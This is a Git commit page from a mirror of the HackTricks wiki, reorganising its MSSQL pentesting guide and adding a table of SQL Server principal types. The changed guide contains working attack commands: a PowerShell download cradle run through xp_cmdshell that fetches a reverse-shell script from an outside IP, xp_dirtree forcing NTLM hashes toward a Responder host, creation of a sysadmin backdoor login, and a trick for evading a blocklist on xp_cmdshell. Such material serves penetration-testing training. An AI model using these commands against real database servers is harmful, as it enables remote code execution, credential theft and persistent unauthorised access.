Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-21 20:23:18 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [#3585] No subject

Browse source
This commit is contained in:
CPol 2022-10-09 17:44:56 +00:00 committed by gitbook-bot
parent d8ffc8fffb
commit 0f5f1ab939
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
4 changed files with 163 additions and 57 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
SUMMARY.md
View file

@ -390,7 +390,8 @@
* [1026 - Pentesting Rusersd](network-services-pentesting/1026-pentesting-rusersd.md)
* [1080 - Pentesting Socks](network-services-pentesting/1080-pentesting-socks.md)
* [1098/1099/1050 - Pentesting Java RMI - RMI-IIOP](network-services-pentesting/1099-pentesting-java-rmi.md)
* [1433 - Pentesting MSSQL - Microsoft SQL Server](network-services-pentesting/pentesting-mssql-microsoft-sql-server.md)
* [1433 - Pentesting MSSQL - Microsoft SQL Server](network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md)
* [Types of MSSQL Users](network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md)
* [1521,1522-1529 - Pentesting Oracle TNS Listener](network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md)
* [Oracle Pentesting requirements installation](network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-pentesting-requirements-installation.md)
* [TNS Poison](network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/tns-poison.md)

168
network-services-pentesting/pentesting-mssql-microsoft-sql-server.md → network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
View file

@ -42,59 +42,11 @@ nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config
msf> use auxiliary/scanner/mssql/mssql_ping
```
{% hint style="info" %}
If you **don't** **have credentials** you can try to guess them. You can use nmap or metasploit. Be careful, you can **block accounts** if you fail login several times using an existing username.
{% endhint %}
### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#sql-server)
### Authenticated Enumeration
#### Manual
```sql
SELECT name FROM master.dbo.sysdatabases #Get databases
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES; #Get table names
#List Linked Servers
EXEC sp_linkedservers
SELECT * FROM sys.servers;
#List users
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
#Create user with sysadmin privs
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
sp_addsrvrolemember 'hacker', 'sysadmin'
```
#### Mssqlclient.py
You can login into the service using **impacket mssqlclient.py**
```bash
mssqlclient.py -db volume -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP> #Recommended -windows-auth when you are going to use a domain. use as domain the netBIOS name of the machine
#Once logged in you can run queries:
SQL> select @@version;
#Steal NTLM hash
sudo responder -I <interface> #Run that in other console
SQL> exec master..xp_dirtree '\\<YOUR_RESPONDER_IP>\test' #Steal the NTLM hash, crack it with john or hashcat
#Try to enable code execution
SQL> enable_xp_cmdshell
#Execute code, 2 sintax, for complex and non complex cmds
SQL> xp_cmdshell whoami /all
SQL> EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'
```
#### sqsh
```bash
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database> #In case Windows Auth using "." as domain na,e for local user
```
![](<../.gitbook/assets/image (20) (1).png>)
#### Metasploit
#### Metasploit (need creds)
```bash
#Set USERNAME, RHOSTS and PASSWORD
@ -128,6 +80,103 @@ msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload
msf> use windows/manage/mssql_local_auth_bypass
```
### [**Brute force**](../../generic-methodologies-and-resources/brute-force.md#sql-server)
### Manual Enumeration
#### Login
```bash
# Using Impacket mssqlclient.py
mssqlclient.py [-db volume] <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
## Recommended -windows-auth when you are going to use a domain. Use as domain the netBIOS name of the machine
mssqlclient.py [-db volume] -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
# Using sqsh
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
## In case Windows Auth using "." as domain name for local user
sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
## In sqsh you need to use GO after writting the query to send it
1> select 1;
2> go
```
#### Common Enumeration
```sql
# Get version
select @@version;
# Get user
select user_name();
# Get databases
SELECT name FROM master.dbo.sysdatabases;
# Use database
USE master
#Get table names
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
#List Linked Servers
EXEC sp_linkedservers
SELECT * FROM sys.servers;
#List users
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
#Create user with sysadmin privs
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
sp_addsrvrolemember 'hacker', 'sysadmin'
```
#### Get User
{% content-ref url="types-of-mssql-users.md" %}
[types-of-mssql-users.md](types-of-mssql-users.md)
{% endcontent-ref %}
```sql
# Get all the users and roles
select * from sys.database_principals;
## This query filters a bit the results
select name,
create_date,
modify_date,
type_desc as type,
authentication_type_desc as authentication_type,
sid
from sys.database_principals
where type not in ('A', 'R')
order by name;
## Both of these select all the users of the current database (not the server).
## Interesting when you cannot acces the table sys.database_principals
EXEC sp_helpuser
SELECT * FROM sysusers
```
#### Get Permissions
Some introduction about some MSSQL terms:
1. **Securable:** These are the resources to which the SQL Server Database Engine authorization system controls access. There are three broader categories under which a securable can be differentiated:
* Server For example databases, logins, endpoints, availability groups and server roles
* Database For example database role, application roles, schema, certificate, full text catalog, user
* Schema For example table, view, procedure, function, synonym
2. **Permission:** Every SQL Server securable has associated permissions like ALTER, CONTROL, CREATE that can be granted to a principal. Permissions are managed at the server level using logins and at the database level using users.
3. **Principal:** The entity that receives permission to a securable is called a principal. The most common principals are logins and database users. Access to a securable is controlled by granting or denying permissions or by adding logins and users to roles which have access.
\
```sql
# Show all different securables names
SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT);
# Show all possible permissions in MSSQL
SELECT * FROM sys.fn_builtin_permissions(DEFAULT);
# Get all my permissions over securable type SERVER
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
# Get all my permissions over a database
USE <database>
SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
```
## Tricks
### Execute commands
@ -149,9 +198,11 @@ sp_configure 'xp_cmdshell', '1'
RECONFIGURE
# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
# Get Rev shell
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'
# Bypass blackisted "EXEC xp_cmdshell"
; DECLARE @x AS VARCHAR(100)=xp_cmdshell; EXEC @x ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net'
```
### NTLM Service Hash gathering
@ -172,7 +223,11 @@ msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
### Abusing MSSQL trusted Links
[**Read this post**](../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **to find more information about how to abuse this feature**
[**Read this post**](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **to find more information about how to abuse this feature:**
{% content-ref url="../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md" %}
[abusing-ad-mssql.md](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md)
{% endcontent-ref %}
### **Write Files**
@ -215,7 +270,7 @@ MSSQL could allow you to execute **scripts in Python and/or R**. These code will
Example trying to execute a **'R'** _"Hellow World!"_ **not working**:
![](<../.gitbook/assets/image (185).png>)
![](<../../.gitbook/assets/image (185).png>)
Example using configured python to perform several actions:
@ -301,6 +356,11 @@ You probably will be able to escalate to Administrator using this token: [Juicy-
* `port:1433 !HTTP`
## References
* [https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users)
* [https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/)
## HackTricks Automatic Commands
```

45
network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md Normal file
View file

@ -0,0 +1,45 @@
# Types of MSSQL Users
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>
Table taken from the [**docs**](https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-database-principals-transact-sql?view=sql-server-ver16).
| Column name | Data type | Description |
| ------------------------------------------ | ----------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| **name** | **sysname** | Name of principal, unique within the database. |
| **principal\_id** | **int** | ID of principal, unique within the database. |
| **type** | **char(1)** | <p>Principal type:<br><br>A = Application role<br><br>C = User mapped to a certificate<br><br>E = External user from Azure Active Directory<br><br>G = Windows group<br><br>K = User mapped to an asymmetric key<br><br>R = Database role<br><br>S = SQL user<br><br>U = Windows user<br><br>X = External group from Azure Active Directory group or applications</p> |
| **type\_desc** | **nvarchar(60)** | <p>Description of principal type.<br><br>APPLICATION_ROLE<br><br>CERTIFICATE_MAPPED_USER<br><br>EXTERNAL_USER<br><br>WINDOWS_GROUP<br><br>ASYMMETRIC_KEY_MAPPED_USER<br><br>DATABASE_ROLE<br><br>SQL_USER<br><br>WINDOWS_USER<br><br>EXTERNAL_GROUPS</p> |
| **default\_schema\_name** | **sysname** | Name to be used when SQL name does not specify a schema. Null for principals not of type S, U, or A. |
| **create\_date** | **datetime** | Time at which the principal was created. |
| **modify\_date** | **datetime** | Time at which the principal was last modified. |
| **owning\_principal\_id** | **int** | ID of the principal that owns this principal. All fixed Database Roles are owned by **dbo** by default. |
| **sid** | **varbinary(85)** | SID (Security Identifier) of the principal. NULL for SYS and INFORMATION SCHEMAS. |
| **is\_fixed\_role** | **bit** | If 1, this row represents an entry for one of the fixed database roles: db\_owner, db\_accessadmin, db\_datareader, db\_datawriter, db\_ddladmin, db\_securityadmin, db\_backupoperator, db\_denydatareader, db\_denydatawriter. |
| **authentication\_type** | **int** | <p><strong>Applies to</strong>: SQL Server 2012 (11.x) and later.<br><br>Signifies authentication type. The following are the possible values and their descriptions.<br><br>0 : No authentication<br>1 : Instance authentication<br>2 : Database authentication<br>3 : Windows authentication<br>4 : Azure Active Directory authentication</p> |
| **authentication\_type\_desc** | **nvarchar(60)** | <p><strong>Applies to</strong>: SQL Server 2012 (11.x) and later.<br><br>Description of the authentication type. The following are the possible values and their descriptions.<br><br><code>NONE</code> : No authentication<br><code>INSTANCE</code> : Instance authentication<br><code>DATABASE</code> : Database authentication<br><code>WINDOWS</code> : Windows authentication<br><code>EXTERNAL</code>: Azure Active Directory authentication</p> |
| **default\_language\_name** | **sysname** | <p><strong>Applies to</strong>: SQL Server 2012 (11.x) and later.<br><br>Signifies the default language for this principal.</p> |
| **default\_language\_lcid** | **int** | <p><strong>Applies to</strong>: SQL Server 2012 (11.x) and later.<br><br>Signifies the default LCID for this principal.</p> |
| **allow\_encrypted\_value\_modifications** | **bit** | <p><strong>Applies to</strong>: SQL Server 2016 (13.x) and later, SQL Database.<br><br>Suppresses cryptographic metadata checks on the server in bulk copy operations. This enables the user to bulk copy data encrypted using Always Encrypted, between tables or databases, without decrypting the data. The default is OFF.</p> |
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

4
windows-hardening/active-directory-methodology/abusing-ad-mssql.md
View file

@ -111,8 +111,8 @@ EXEC xp_cmdshell 'powershell -w hidden -enc <blah>';
### MSSQL Extra
{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server.md" %}
[pentesting-mssql-microsoft-sql-server.md](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server.md)
{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/" %}
[pentesting-mssql-microsoft-sql-server](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/)
{% endcontent-ref %}
## MSSQL Trusted Links